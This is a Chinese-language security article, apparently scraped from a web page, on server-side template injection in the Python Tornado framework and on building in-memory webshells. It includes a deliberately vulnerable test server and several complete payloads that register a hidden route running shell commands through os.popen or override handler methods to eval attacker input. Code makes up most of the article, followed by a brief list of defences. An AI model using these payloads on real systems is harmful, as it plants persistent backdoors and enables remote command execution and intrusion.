Tornado框架隐秘漏洞分析与内存马构造技术<\/h1>

1. Tornado框架概述<\/h2>

Tornado是一个使用Python编写的Web框架和异步网络库，最初由FriendFeed开发。其主要特点包括：<\/p>

非阻塞网络I\/O特性<\/li>
适合长轮询、WebSocket等需要长时间连接的应用场景<\/li>

内置可扩展的模板引擎<\/li> <\/ul>

2. Tornado模板渲染机制<\/h2>
Tornado提供两个主要的模板渲染函数：<\/p>

2.1 render方法<\/h3>

用于加载模板文件<\/li>
将指定参数传递给模板<\/li>

最终将渲染结果发送给客户端<\/li> <\/ul>

2.2 render_string方法<\/h3>

直接从字符串中加载模板内容<\/li>
接受参数填充模板占位符<\/li>

返回渲染后的字符串，不直接输出到HTTP响应<\/li> <\/ul>

2.3 模板语法<\/h3>

{{ ... }} - 输出Python表达式结果（默认HTML编码）
{{! ... }} - 输出未经转义的内容
{% ... %} - 执行控制语句（条件判断、循环等）
{# ... #} - 模板注释
<\/code><\/pre>
3. 内存马构造思路<\/h2>
Web服务内存马构造主要有两种思路：<\/p>

注册一个新的URL，绑定恶意函数<\/li>
修改原有的URL处理逻辑<\/li>
<\/ol>
4. 测试环境搭建<\/h2>
import<\/span> tornado.ioloop
<\/span><\/span>import<\/span> tornado.web
<\/span><\/span>
<\/span><\/span>class<\/span> IndexHandler<\/span>(tornado.<\/span>web.<\/span>RequestHandler):
<\/span><\/span>    def<\/span> get<\/span>(self):
<\/span><\/span>        tornado.<\/span>web.<\/span>RequestHandler.<\/span>_template_loaders =<\/span> {} # 清空模板引擎<\/span>
<\/span><\/span>        with<\/span> open('index.html'<\/span>, 'w'<\/span>) as<\/span> (f):
<\/span><\/span>            f.<\/span>write(self.<\/span>get_argument('name'<\/span>)) # GET方式传name参数<\/span>
<\/span><\/span>        self.<\/span>render('index.html'<\/span>)
<\/span><\/span>
<\/span><\/span>app =<\/span> tornado.<\/span>web.<\/span>Application([('\/'<\/span>, IndexHandler)])
<\/span><\/span>app.<\/span>listen(5000<\/span>, address=<\/span>"127.0.0.1"<\/span>)
<\/span><\/span>tornado.<\/span>ioloop.<\/span>IOLoop.<\/span>current().<\/span>start()
<\/span><\/span><\/code><\/pre>关键点<\/strong>：需要清空_template_loaders<\/code>，否则会一直使用第一个传入的payload。<\/p>
5. 路由规则分析<\/h2>
5.1 add_handlers方法<\/h3>
def<\/span> add_handlers<\/span>(self, host_pattern: str, host_handlers: _RuleList) -><\/span> None<\/span>:
<\/span><\/span>    host_matcher =<\/span> HostMatches(host_pattern)
<\/span><\/span>    rule =<\/span> Rule(host_matcher, _ApplicationRouter(self, host_handlers))
<\/span><\/span>    self.<\/span>default_router.<\/span>rules.<\/span>insert(-<\/span>1<\/span>, rule)
<\/span><\/span><\/code><\/pre>5.2 add_rules方法<\/h3>
def<\/span> add_rules<\/span>(self, rules: _RuleList) -><\/span> None<\/span>:
<\/span><\/span>    for<\/span> rule in<\/span> rules:
<\/span><\/span>        if<\/span> isinstance(rule, (tuple, list)):
<\/span><\/span>            assert<\/span> len(rule) in<\/span> (2<\/span>, 3<\/span>, 4<\/span>)
<\/span><\/span>            if<\/span> isinstance(rule[0<\/span>], basestring_type):
<\/span><\/span>                rule =<\/span> Rule(PathMatches(rule[0<\/span>]), *<\/span>rule[1<\/span>:])
<\/span><\/span>            else<\/span>:
<\/span><\/span>                rule =<\/span> Rule(*<\/span>rule)
<\/span><\/span>        self.<\/span>rules.<\/span>append(self.<\/span>process_rule(rule))
<\/span><\/span><\/code><\/pre>6. 内存马构造技术<\/h2>
6.1 新增注册路由方式<\/h3>
Payload构造<\/strong>：<\/p>
type(
<\/span><\/span>    "x"<\/span>,
<\/span><\/span>    (__import__("tornado"<\/span>).<\/span>web.<\/span>RequestHandler,),
<\/span><\/span>    {
<\/span><\/span>        "get"<\/span>: lambda<\/span> x: x.<\/span>write(__import__('os'<\/span>).<\/span>popen(x.<\/span>get_argument('cmd'<\/span>)).<\/span>read())
<\/span><\/span>    }
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>完整内存马<\/strong>：<\/p>
{{handler.application.add_handlers(".*",[("\/4",type("x",(__import__("tornado").web.RequestHandler,),{"get":lambda x: x.write(__import__('os').popen(x.get_argument('cmd')).read())}))])}}
<\/code><\/pre>
6.2 覆盖处理函数方式<\/h3>
关键点<\/strong>：<\/p>

Tornado每次请求都是全新的handler和request<\/li>
直接绑定恶意函数的方式不可行<\/li>
需要修改类级别行为<\/li>
<\/ul>
内存马构造<\/strong>：<\/p>
{% raw handler.__class__.prepare = lambda self: self.write(str(eval(self.get_query_argument("cmd", "id")))) %}
<\/code><\/pre>
6.3 异常情况下的内存马<\/h3>
6.3.1 使用request.connection.write<\/h4>
{{handler.__class__.prepare = lambda self: self.request.connection.write((str(eval(self.get_query_argument("cmd", "id")))).encode())}}
<\/code><\/pre>
6.3.2 覆盖异常处理函数<\/h4>
{% raw handler.__class__._handle_request_exception = lambda x, y: [x.write((str(eval(x.get_query_argument("cmd", "id")))).encode()), x.finish()][0] %}
<\/code><\/pre>
7. 防御措施<\/h2>

严格控制模板渲染的用户输入<\/li>
禁用或限制模板中的动态代码执行功能<\/li>
定期更新Tornado框架版本<\/li>
实施严格的输入验证和输出编码<\/li>
监控异常的路由规则变更<\/li>
<\/ol>
8. 总结<\/h2>
本文详细分析了Tornado框架中存在的安全漏洞，特别是通过模板注入实现内存马的技术。通过三种不同的方式（新增路由、覆盖处理函数、异常处理）实现了命令执行功能，这些技术对于安全研究和防御建设都具有重要参考价值。<\/p>

Tornado框架隐秘漏洞分析与内存马构造技术<\/h1>

2. Tornado模板渲染机制<\/h2> Tornado提供两个主要的模板渲染函数：<\/p>

6. 内存马构造技术<\/h2>

6.3 异常情况下的内存马<\/h3>

2. Tornado模板渲染机制<\/h2>
Tornado提供两个主要的模板渲染函数：<\/p>